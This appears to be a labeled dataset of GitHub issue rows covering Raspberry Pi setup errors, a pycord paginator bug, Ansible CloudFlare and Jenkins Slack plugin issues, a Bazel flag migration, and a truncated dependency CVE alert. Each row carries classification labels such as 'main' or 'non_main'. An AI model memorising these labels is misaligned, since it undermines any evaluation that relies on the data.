**Is your feature request related to a problem? Please describe.** I just installed it on my RPi 3 b+r1.3 . When I get to the configuration step here are some errors I got. Error 1 at step: cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Returned message: cp: cannot create regular file '/opt/RPi-Reporter-MQTT2HA-Daemon/config.ini': Permission denied Error 2 at the next step : vim /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini Returned message: -bash: vim: command not found **Describe the solution you'd like** Error 1: This command worked for me sudo cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Error 2: This command worked for me sudo nano /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** This is just to help any one that runs into these linux basics and is a home assistant and smart home enthousiaste. Other then this straight forward, thanks to Stephen.
1.0
Configuration for non linux initiated - **Is your feature request related to a problem? Please describe.** I just installed it on my RPi 3 b+r1.3 . When I get to the configuration step here are some errors I got. Error 1 at step: cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Returned message: cp: cannot create regular file '/opt/RPi-Reporter-MQTT2HA-Daemon/config.ini': Permission denied Error 2 at the next step : vim /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini Returned message: -bash: vim: command not found **Describe the solution you'd like** Error 1: This command worked for me sudo cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Error 2: This command worked for me sudo nano /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** This is just to help any one that runs into these linux basics and is a home assistant and smart home enthousiaste. Other then this straight forward, thanks to Stephen.
non_main
configuration for non linux initiated is your feature request related to a problem please describe i just installed it on my rpi b when i get to the configuration step here are some errors i got error at step cp opt rpi reporter daemon config ini dist ini returned message cp cannot create regular file opt rpi reporter daemon config ini permission denied error at the next step vim opt rpi reporter daemon config ini returned message bash vim command not found describe the solution you d like error this command worked for me sudo cp opt rpi reporter daemon config ini dist ini error this command worked for me sudo nano opt rpi reporter daemon config ini describe alternatives you ve considered a clear and concise description of any alternative solutions or features you ve considered additional context this is just to help any one that runs into these linux basics and is a home assistant and smart home enthousiaste other then this straight forward thanks to stephen
0
4,679
24,175,476,803
IssuesEvent
2022-09-23 00:50:08
Pycord-Development/pycord
https://api.github.com/repos/Pycord-Development/pycord
closed
ext.pages message is none if "View Channel" permissions are missing
unconfirmed bug ext.pages (not maintained)
### Summary If the bot does not have "View Channel" permissions, exceptions are not catched ### Reproduction Steps ```py @slash_command() async def test(self, ctx): await ctx.defer() # Note: The defer is needed! Otherwise it works page_groups = [] page_groups.append(pages.PageGroup(pages="1", label="label 1")) page_groups.append(pages.PageGroup(pages="2", label="label 2")) paginator = pages.Paginator(pages=page_groups, show_disabled=False, show_menu=True) await paginator.respond(ctx.interaction, ephemeral=False) ``` ### Minimal Reproducible Code _No response_ ### Expected Results That it should either work (like without `defer`) or catch the exception :) ### Actual Results On `/test` you get: ``` Ignoring exception in command test: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 127, in wrapped ret = await coro(arg) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 877, in _invoke await self.callback(self.cog, ctx, **kwargs) File "g:\develop\bot\cogs\stuff.py", line 403, in test await paginator.respond(ctx.interaction, ephemeral=False) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1068, in respond msg = await msg.channel.fetch_message(msg.id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\abc.py", line 1601, in fetch_message data = await self._state.http.get_message(channel.id, id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\http.py", line 354, in request raise Forbidden(response, data) discord.errors.Forbidden: 403 Forbidden (error code: 50001): Missing Access The above exception was the direct cause of the following exception: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\bot.py", line 992, in invoke_application_command await ctx.command.invoke(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 358, in invoke await injected(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 135, in wrapped raise ApplicationCommandInvokeError(exc) from exc discord.errors.ApplicationCommandInvokeError: Application Command raised an exception: Forbidden: 403 Forbidden (error code: 50001): Missing Access ``` and when you select an other item in the dropdown you get ``` Ignoring exception in view <Paginator timeout=180.0 children=2> for item <PaginatorMenu placeholder='Select Page Group' min_values=1 max_values=1 options=[<SelectOption label='label 1' value='label 1' description=None emoji=None default=False>, <SelectOption label='label 2' value='label 2' description=None emoji=None default=False>] disabled=False>: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ui\view.py", line 375, in _scheduled_task await item.callback(interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1150, in callback return await self.paginator.update( File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 522, in update await self.goto_page(self.current_page, interaction=interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 630, in goto_page message_id=self.message.id, AttributeError: 'NoneType' object has no attribute 'id' ``` ### Intents default ### System Information - Python v3.9.4-final - py-cord v2.0.0-final - aiohttp v3.7.3 ### Checklist - [X] I have searched the open issues for duplicates. - [X] I have shown the entire traceback, if possible. - [X] I have removed my token from display, if visible. ### Additional Context _No response_
True
ext.pages message is none if "View Channel" permissions are missing - ### Summary If the bot does not have "View Channel" permissions, exceptions are not catched ### Reproduction Steps ```py @slash_command() async def test(self, ctx): await ctx.defer() # Note: The defer is needed! Otherwise it works page_groups = [] page_groups.append(pages.PageGroup(pages="1", label="label 1")) page_groups.append(pages.PageGroup(pages="2", label="label 2")) paginator = pages.Paginator(pages=page_groups, show_disabled=False, show_menu=True) await paginator.respond(ctx.interaction, ephemeral=False) ``` ### Minimal Reproducible Code _No response_ ### Expected Results That it should either work (like without `defer`) or catch the exception :) ### Actual Results On `/test` you get: ``` Ignoring exception in command test: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 127, in wrapped ret = await coro(arg) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 877, in _invoke await self.callback(self.cog, ctx, **kwargs) File "g:\develop\bot\cogs\stuff.py", line 403, in test await paginator.respond(ctx.interaction, ephemeral=False) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1068, in respond msg = await msg.channel.fetch_message(msg.id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\abc.py", line 1601, in fetch_message data = await self._state.http.get_message(channel.id, id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\http.py", line 354, in request raise Forbidden(response, data) discord.errors.Forbidden: 403 Forbidden (error code: 50001): Missing Access The above exception was the direct cause of the following exception: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\bot.py", line 992, in invoke_application_command await ctx.command.invoke(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 358, in invoke await injected(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 135, in wrapped raise ApplicationCommandInvokeError(exc) from exc discord.errors.ApplicationCommandInvokeError: Application Command raised an exception: Forbidden: 403 Forbidden (error code: 50001): Missing Access ``` and when you select an other item in the dropdown you get ``` Ignoring exception in view <Paginator timeout=180.0 children=2> for item <PaginatorMenu placeholder='Select Page Group' min_values=1 max_values=1 options=[<SelectOption label='label 1' value='label 1' description=None emoji=None default=False>, <SelectOption label='label 2' value='label 2' description=None emoji=None default=False>] disabled=False>: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ui\view.py", line 375, in _scheduled_task await item.callback(interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1150, in callback return await self.paginator.update( File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 522, in update await self.goto_page(self.current_page, interaction=interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 630, in goto_page message_id=self.message.id, AttributeError: 'NoneType' object has no attribute 'id' ``` ### Intents default ### System Information - Python v3.9.4-final - py-cord v2.0.0-final - aiohttp v3.7.3 ### Checklist - [X] I have searched the open issues for duplicates. - [X] I have shown the entire traceback, if possible. - [X] I have removed my token from display, if visible. ### Additional Context _No response_
main
ext pages message is none if view channel permissions are missing summary if the bot does not have view channel permissions exceptions are not catched reproduction steps py slash command async def test self ctx await ctx defer note the defer is needed otherwise it works page groups page groups append pages pagegroup pages label label page groups append pages pagegroup pages label label paginator pages paginator pages page groups show disabled false show menu true await paginator respond ctx interaction ephemeral false minimal reproducible code no response expected results that it should either work like without defer or catch the exception actual results on test you get ignoring exception in command test traceback most recent call last file g develop bot venv pycord lib site packages discord commands core py line in wrapped ret await coro arg file g develop bot venv pycord lib site packages discord commands core py line in invoke await self callback self cog ctx kwargs file g develop bot cogs stuff py line in test await paginator respond ctx interaction ephemeral false file g develop bot venv pycord lib site packages discord ext pages pagination py line in respond msg await msg channel fetch message msg id file g develop bot venv pycord lib site packages discord abc py line in fetch message data await self state http get message channel id id file g develop bot venv pycord lib site packages discord http py line in request raise forbidden response data discord errors forbidden forbidden error code missing access the above exception was the direct cause of the following exception traceback most recent call last file g develop bot venv pycord lib site packages discord bot py line in invoke application command await ctx command invoke ctx file g develop bot venv pycord lib site packages discord commands core py line in invoke await injected ctx file g develop bot venv pycord lib site packages discord commands core py line in wrapped raise applicationcommandinvokeerror exc from exc discord errors applicationcommandinvokeerror application command raised an exception forbidden forbidden error code missing access and when you select an other item in the dropdown you get ignoring exception in view for item traceback most recent call last file g develop bot venv pycord lib site packages discord ui view py line in scheduled task await item callback interaction file g develop bot venv pycord lib site packages discord ext pages pagination py line in callback return await self paginator update file g develop bot venv pycord lib site packages discord ext pages pagination py line in update await self goto page self current page interaction interaction file g develop bot venv pycord lib site packages discord ext pages pagination py line in goto page message id self message id attributeerror nonetype object has no attribute id intents default system information python final py cord final aiohttp checklist i have searched the open issues for duplicates i have shown the entire traceback if possible i have removed my token from display if visible additional context no response
1
999
4,761,580,318
IssuesEvent
2016-10-25 08:42:52
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
Add proxied support to CloudFlare
affects_2.1 feature_idea networking waiting_on_maintainer
##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME cloudflare_dns.py ##### ANSIBLE VERSION ``` ansible 2.1.0.0 config file = configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT N/A ##### SUMMARY I would be really great if you can add support for the CloudFlare "proxied" flag, so that you can set true/false flag on creation and/or update of records ##### STEPS TO REPRODUCE ``` - name: "Create @ A Record 1" cloudflare_dns: zone: example.com type: A value: 10.10.10.10 proxied: true account_email: "{{ cloudflare_email }}" account_api_token: "{{ cloudflare_api_token }}" register: record ``` ##### EXPECTED RESULTS This would turn on CloudFlare's DNS/HTTP proxy ##### ACTUAL RESULTS ``` ok: [localhost] => {"changed": false, "invocation": {"module_args": {"account_api_token": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER", "account_email": "sam@madjungle.com", "port": null, "priority": 1, "proto": null, "record": "@", "service": null, "solo": null, "state": "present", "timeout": 30, "ttl": 1, "type": "A", "value": "10.10.10.10", "weight": 1, "zone": "example.com"}, "module_name": "cloudflare_dns"}, "result": {"record": {"content": "10.10.10.10", "created_on": "2016-07-18T11:10:09.100198Z", "id": "1234567890", "locked": false, "meta": {"auto_added": false}, "modified_on": "2016-07-18T11:10:09.100198Z", "name": "example.com", "proxiable": true, "proxied": true, "ttl": 1, "type": "A", "zone_id": "1234567890", "zone_name": "example.com"}}} ```
True
Add proxied support to CloudFlare - ##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME cloudflare_dns.py ##### ANSIBLE VERSION ``` ansible 2.1.0.0 config file = configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT N/A ##### SUMMARY I would be really great if you can add support for the CloudFlare "proxied" flag, so that you can set true/false flag on creation and/or update of records ##### STEPS TO REPRODUCE ``` - name: "Create @ A Record 1" cloudflare_dns: zone: example.com type: A value: 10.10.10.10 proxied: true account_email: "{{ cloudflare_email }}" account_api_token: "{{ cloudflare_api_token }}" register: record ``` ##### EXPECTED RESULTS This would turn on CloudFlare's DNS/HTTP proxy ##### ACTUAL RESULTS ``` ok: [localhost] => {"changed": false, "invocation": {"module_args": {"account_api_token": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER", "account_email": "sam@madjungle.com", "port": null, "priority": 1, "proto": null, "record": "@", "service": null, "solo": null, "state": "present", "timeout": 30, "ttl": 1, "type": "A", "value": "10.10.10.10", "weight": 1, "zone": "example.com"}, "module_name": "cloudflare_dns"}, "result": {"record": {"content": "10.10.10.10", "created_on": "2016-07-18T11:10:09.100198Z", "id": "1234567890", "locked": false, "meta": {"auto_added": false}, "modified_on": "2016-07-18T11:10:09.100198Z", "name": "example.com", "proxiable": true, "proxied": true, "ttl": 1, "type": "A", "zone_id": "1234567890", "zone_name": "example.com"}}} ```
main
add proxied support to cloudflare issue type feature idea component name cloudflare dns py ansible version ansible config file configured module search path default w o overrides configuration n a os environment n a summary i would be really great if you can add support for the cloudflare proxied flag so that you can set true false flag on creation and or update of records steps to reproduce name create a record cloudflare dns zone example com type a value proxied true account email cloudflare email account api token cloudflare api token register record expected results this would turn on cloudflare s dns http proxy actual results ok changed false invocation module args account api token value specified in no log parameter account email sam madjungle com port null priority proto null record service null solo null state present timeout ttl type a value weight zone example com module name cloudflare dns result record content created on id locked false meta auto added false modified on name example com proxiable true proxied true ttl type a zone id zone name example com
1
4,173
19,988,162,808
IssuesEvent
2022-01-31 00:07:00
Homebrew/homebrew-cask
https://api.github.com/repos/Homebrew/homebrew-cask
closed
Re-open handbrake-cli PR
awaiting maintainer feedback stale
### Provide a detailed description of the proposed feature The pull request https://github.com/Homebrew/homebrew-cask/pull/109484 adds a separate `handbrake-cli` cask, since the current `handbrake` cask doesn't install HandbrakeCLI automatically. We should re-open and merge the PR. ### What is the motivation for the feature? This [StackOverflow thread](https://apple.stackexchange.com/questions/85731/how-do-i-install-handbrake-cli#comment461916_188200) has some more detail - it appears that the CLI was extracted to a separate DMG file on the Handbrake website at some point in time. In my own testing, the HandbrakeCLI needed to be downloaded from https://handbrake.fr/downloads2.php instead. ### Example use case ``` brew install handbrake-cli HandbrakeCLI -h ```
True
Re-open handbrake-cli PR - ### Provide a detailed description of the proposed feature The pull request https://github.com/Homebrew/homebrew-cask/pull/109484 adds a separate `handbrake-cli` cask, since the current `handbrake` cask doesn't install HandbrakeCLI automatically. We should re-open and merge the PR. ### What is the motivation for the feature? This [StackOverflow thread](https://apple.stackexchange.com/questions/85731/how-do-i-install-handbrake-cli#comment461916_188200) has some more detail - it appears that the CLI was extracted to a separate DMG file on the Handbrake website at some point in time. In my own testing, the HandbrakeCLI needed to be downloaded from https://handbrake.fr/downloads2.php instead. ### Example use case ``` brew install handbrake-cli HandbrakeCLI -h ```
main
re open handbrake cli pr provide a detailed description of the proposed feature the pull request adds a separate handbrake cli cask since the current handbrake cask doesn t install handbrakecli automatically we should re open and merge the pr what is the motivation for the feature this has some more detail it appears that the cli was extracted to a separate dmg file on the handbrake website at some point in time in my own testing the handbrakecli needed to be downloaded from instead example use case brew install handbrake cli handbrakecli h
1
732,785
25,276,548,361
IssuesEvent
2022-11-16 13:02:42
episphere/biospecimen
https://api.github.com/repos/episphere/biospecimen
closed
Rename "Comments" to "Feedback" on the Packages Receipts and Shipping Report pages
enhancement Priority 2
Please rename "Comments" to "Feedback" on the receipts page and shipping report page. This is solely a change in name, not function. See the images below for guidance. ![Screen Shot 2022-11-14 at 8 53 10 AM](https://user-images.githubusercontent.com/85250133/201677649-b577107c-97a4-4536-b257-352a90827727.png) ![Screen Shot 2022-11-14 at 8 53 31 AM](https://user-images.githubusercontent.com/85250133/201677658-6ce70c9c-c960-4261-9f24-b251a505e27b.png)
1.0
Rename "Comments" to "Feedback" on the Packages Receipts and Shipping Report pages - Please rename "Comments" to "Feedback" on the receipts page and shipping report page. This is solely a change in name, not function. See the images below for guidance. ![Screen Shot 2022-11-14 at 8 53 10 AM](https://user-images.githubusercontent.com/85250133/201677649-b577107c-97a4-4536-b257-352a90827727.png) ![Screen Shot 2022-11-14 at 8 53 31 AM](https://user-images.githubusercontent.com/85250133/201677658-6ce70c9c-c960-4261-9f24-b251a505e27b.png)
non_main
rename comments to feedback on the packages receipts and shipping report pages please rename comments to feedback on the receipts page and shipping report page this is solely a change in name not function see the images below for guidance
0
369
3,362,460,720
IssuesEvent
2015-11-20 05:56:21
jenkinsci/slack-plugin
https://api.github.com/repos/jenkinsci/slack-plugin
closed
Release slack plugin 1.8.1
maintainer communication
This issue is to track progress of releasing slack plugin 1.8.1. TODO: - [x] Configure your credentials in `~/.m2/settings.xml`. (outlined in [making a new release][plugin-release] doc) - [x] Create a new issue to track the release and give it the label `maintainer communication`. - [x] Create a release branch. `git checkout origin/slack-1.8-stable -b prepare_release` - [x] Update the release notes in `CHANGELOG.md`. - [x] Open a pull request from `prepare_release` branch to `slack-1.8-stable` branch. Merge it. - [x] Fetch the latest `slack-1.8-stable`. - [x] Execute the release plugin. ``` mvn org.apache.maven.plugins:maven-release-plugin:2.5:prepare org.apache.maven.plugins:maven-release-plugin:2.5:perform ``` - [x] Wait for the plugin to be released into the Jenkins Update Center. - [x] Successfully perform an upgrade from the last stable plugin release to the current release. I pin which version of the release plugin to use because of the working around common issues section of the [release document][plugin-release]. [plugin-release]: https://wiki.jenkins-ci.org/display/JENKINS/Hosting+Plugins
True
Release slack plugin 1.8.1 - This issue is to track progress of releasing slack plugin 1.8.1. TODO: - [x] Configure your credentials in `~/.m2/settings.xml`. (outlined in [making a new release][plugin-release] doc) - [x] Create a new issue to track the release and give it the label `maintainer communication`. - [x] Create a release branch. `git checkout origin/slack-1.8-stable -b prepare_release` - [x] Update the release notes in `CHANGELOG.md`. - [x] Open a pull request from `prepare_release` branch to `slack-1.8-stable` branch. Merge it. - [x] Fetch the latest `slack-1.8-stable`. - [x] Execute the release plugin. ``` mvn org.apache.maven.plugins:maven-release-plugin:2.5:prepare org.apache.maven.plugins:maven-release-plugin:2.5:perform ``` - [x] Wait for the plugin to be released into the Jenkins Update Center. - [x] Successfully perform an upgrade from the last stable plugin release to the current release. I pin which version of the release plugin to use because of the working around common issues section of the [release document][plugin-release]. [plugin-release]: https://wiki.jenkins-ci.org/display/JENKINS/Hosting+Plugins
main
release slack plugin this issue is to track progress of releasing slack plugin todo configure your credentials in settings xml outlined in making a new release doc create a new issue to track the release and give it the label maintainer communication create a release branch git checkout origin slack stable b prepare release update the release notes in changelog md open a pull request from prepare release branch to slack stable branch merge it fetch the latest slack stable execute the release plugin mvn org apache maven plugins maven release plugin prepare org apache maven plugins maven release plugin perform wait for the plugin to be released into the jenkins update center successfully perform an upgrade from the last stable plugin release to the current release i pin which version of the release plugin to use because of the working around common issues section of the
1
177,151
6,574,846,190
IssuesEvent
2017-09-11 14:16:15
inverse-inc/packetfence
https://api.github.com/repos/inverse-inc/packetfence
opened
LDAP Source: authenticate+authorize never ending connection
Priority: High Type: Bug
Right now in LDAP we have a connection timeout which is used passed onto IO::Socket according to Net::LDAP perldoc. I have seen an issue where the pfqueue workers are not recovering from a temporary LDAP connection issue and are stuck reading from the LDAP TCP socket (strace reports its reading from the file descriptor associated to that TCP connection). That connection is maintaining as ESTABLISHED but seems none of the two parties in the connection are saying a thing. We should: - [ ] See if we can find anything about the underlying bug which is the never ending connection - [ ] Have a global timeout when doing any LDAP query in Authentication::Source::LDAPSource to have a full safety net in case anything goes wrong during that process
1.0
LDAP Source: authenticate+authorize never ending connection - Right now in LDAP we have a connection timeout which is used passed onto IO::Socket according to Net::LDAP perldoc. I have seen an issue where the pfqueue workers are not recovering from a temporary LDAP connection issue and are stuck reading from the LDAP TCP socket (strace reports its reading from the file descriptor associated to that TCP connection). That connection is maintaining as ESTABLISHED but seems none of the two parties in the connection are saying a thing. We should: - [ ] See if we can find anything about the underlying bug which is the never ending connection - [ ] Have a global timeout when doing any LDAP query in Authentication::Source::LDAPSource to have a full safety net in case anything goes wrong during that process
non_main
ldap source authenticate authorize never ending connection right now in ldap we have a connection timeout which is used passed onto io socket according to net ldap perldoc i have seen an issue where the pfqueue workers are not recovering from a temporary ldap connection issue and are stuck reading from the ldap tcp socket strace reports its reading from the file descriptor associated to that tcp connection that connection is maintaining as established but seems none of the two parties in the connection are saying a thing we should see if we can find anything about the underlying bug which is the never ending connection have a global timeout when doing any ldap query in authentication source ldapsource to have a full safety net in case anything goes wrong during that process
0
5,208
26,464,330,565
IssuesEvent
2023-01-16 21:17:36
bazelbuild/intellij
https://api.github.com/repos/bazelbuild/intellij
closed
Flag --incompatible_disable_starlark_host_transitions will break IntelliJ UE Plugin in Bazel 7.0
type: bug product: IntelliJ topic: bazel awaiting-maintainer
Incompatible flag `--incompatible_disable_starlark_host_transitions` will be enabled by default in the next major release (Bazel 7.0), thus breaking IntelliJ UE Plugin. Please migrate to fix this and unblock the flip of this flag. The flag is documented here: [bazelbuild/bazel#17032](https://github.com/bazelbuild/bazel/issues/17032). Please check the following CI builds for build and test results: - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42fc-481a-b548-09370831fe55) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42f7-4441-90ce-33e243117428) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42ff-4f70-a4b0-0eef7d237e6f) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4309-4cac-8378-295d1599ab46) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4303-4aad-b069-5b2e4ebfc432) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-430d-4dec-a666-753e8ad6bab1) Never heard of incompatible flags before? We have [documentation](https://docs.bazel.build/versions/master/backward-compatibility.html) that explains everything. If you have any questions, please file an issue in https://github.com/bazelbuild/continuous-integration.
True
Flag --incompatible_disable_starlark_host_transitions will break IntelliJ UE Plugin in Bazel 7.0 - Incompatible flag `--incompatible_disable_starlark_host_transitions` will be enabled by default in the next major release (Bazel 7.0), thus breaking IntelliJ UE Plugin. Please migrate to fix this and unblock the flip of this flag. The flag is documented here: [bazelbuild/bazel#17032](https://github.com/bazelbuild/bazel/issues/17032). Please check the following CI builds for build and test results: - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42fc-481a-b548-09370831fe55) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42f7-4441-90ce-33e243117428) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42ff-4f70-a4b0-0eef7d237e6f) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4309-4cac-8378-295d1599ab46) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4303-4aad-b069-5b2e4ebfc432) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-430d-4dec-a666-753e8ad6bab1) Never heard of incompatible flags before? We have [documentation](https://docs.bazel.build/versions/master/backward-compatibility.html) that explains everything. If you have any questions, please file an issue in https://github.com/bazelbuild/continuous-integration.
main
flag incompatible disable starlark host transitions will break intellij ue plugin in bazel incompatible flag incompatible disable starlark host transitions will be enabled by default in the next major release bazel thus breaking intellij ue plugin please migrate to fix this and unblock the flip of this flag the flag is documented here please check the following ci builds for build and test results never heard of incompatible flags before we have that explains everything if you have any questions please file an issue in
1
3,996
18,522,865,063
IssuesEvent
2021-10-20 16:49:57
WarenGonzaga/buymeacoffee.js
https://api.github.com/repos/WarenGonzaga/buymeacoffee.js
closed
sponsor and supporter badge broken images
bug maintainers only
I'm aware that the badges are broken on all of my projects due to the issue in my recent subdomain. I'm moving my digital assets to the new domain name.
True
sponsor and supporter badge broken images - I'm aware that the badges are broken on all of my projects due to the issue in my recent subdomain. I'm moving my digital assets to the new domain name.
main
sponsor and supporter badge broken images i m aware that the badges are broken on all of my projects due to the issue in my recent subdomain i m moving my digital assets to the new domain name
1
45,014
23,864,446,045
IssuesEvent
2022-09-07 09:48:15
sapphiredev/shapeshift
https://api.github.com/repos/sapphiredev/shapeshift
opened
request: `setValidationEnabled` should [un]wrap the validator into an `PartialValidator<T>`
performance
### Is there an existing issue or pull request for this? - [X] I have searched the existing issues and pull requests ### Feature description Right now, all validators have checks for whether or not they should run validations, as seen below: https://github.com/sapphiredev/shapeshift/blob/e9a029a995d6863dfa07ef3493b7da1568ddabef/src/validators/BaseValidator.ts#L74-L78 This comes with a large performance impact, specially from those who desire to use the library without conditional validation. Also goes against Shapeshift's internal design of running the least amount of conditionals as possible. Before we added conditional validation, Shapeshift was comfortably among the fastest libraries in our benchmarks. ### Desired solution A wrapper would solve the performance impact by making the validators always run the logic and constraints, where the `PartialValidator<T>` would exclusively only run the handler and never the constraints (with no extra checks, of course). For function (dynamic validation), we can also add a second class, or add a check in `PartialValidator<T>`, invalidating the last sentence in the previous paragraph. Unwrapping a `PartialValidator<T>` should give back the underlying, fully-checked validator. ### Alternatives considered N/a. ### Additional context _No response_
True
request: `setValidationEnabled` should [un]wrap the validator into an `PartialValidator<T>` - ### Is there an existing issue or pull request for this? - [X] I have searched the existing issues and pull requests ### Feature description Right now, all validators have checks for whether or not they should run validations, as seen below: https://github.com/sapphiredev/shapeshift/blob/e9a029a995d6863dfa07ef3493b7da1568ddabef/src/validators/BaseValidator.ts#L74-L78 This comes with a large performance impact, specially from those who desire to use the library without conditional validation. Also goes against Shapeshift's internal design of running the least amount of conditionals as possible. Before we added conditional validation, Shapeshift was comfortably among the fastest libraries in our benchmarks. ### Desired solution A wrapper would solve the performance impact by making the validators always run the logic and constraints, where the `PartialValidator<T>` would exclusively only run the handler and never the constraints (with no extra checks, of course). For function (dynamic validation), we can also add a second class, or add a check in `PartialValidator<T>`, invalidating the last sentence in the previous paragraph. Unwrapping a `PartialValidator<T>` should give back the underlying, fully-checked validator. ### Alternatives considered N/a. ### Additional context _No response_
non_main
request setvalidationenabled should wrap the validator into an partialvalidator is there an existing issue or pull request for this i have searched the existing issues and pull requests feature description right now all validators have checks for whether or not they should run validations as seen below this comes with a large performance impact specially from those who desire to use the library without conditional validation also goes against shapeshift s internal design of running the least amount of conditionals as possible before we added conditional validation shapeshift was comfortably among the fastest libraries in our benchmarks desired solution a wrapper would solve the performance impact by making the validators always run the logic and constraints where the partialvalidator would exclusively only run the handler and never the constraints with no extra checks of course for function dynamic validation we can also add a second class or add a check in partialvalidator invalidating the last sentence in the previous paragraph unwrapping a partialvalidator should give back the underlying fully checked validator alternatives considered n a additional context no response
0
18,822
3,088,935,116
IssuesEvent
2015-08-25 19:03:20
zinic/pyrox
https://api.github.com/repos/zinic/pyrox
closed
Connection is not closed after rejecting request from a filter
defect
The connection is closed during a normal request, but not when you intercept the request, ie via a filtering.reject()
1.0
Connection is not closed after rejecting request from a filter - The connection is closed during a normal request, but not when you intercept the request, ie via a filtering.reject()
non_main
connection is not closed after rejecting request from a filter the connection is closed during a normal request but not when you intercept the request ie via a filtering reject
0
103,096
16,601,982,387
IssuesEvent
2021-06-01 20:52:25
samq-ghdemo/SEARCH-NCJIS-nibrs
https://api.github.com/repos/samq-ghdemo/SEARCH-NCJIS-nibrs
opened
CVE-2021-29425 (Medium) detected in commons-io-2.6.jar, commons-io-2.5.jar
security vulnerability
## CVE-2021-29425 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>commons-io-2.6.jar</b>, <b>commons-io-2.5.jar</b></p></summary> <p> <details><summary><b>commons-io-2.6.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-route/pom.xml</p> <p>Path to vulnerable library: 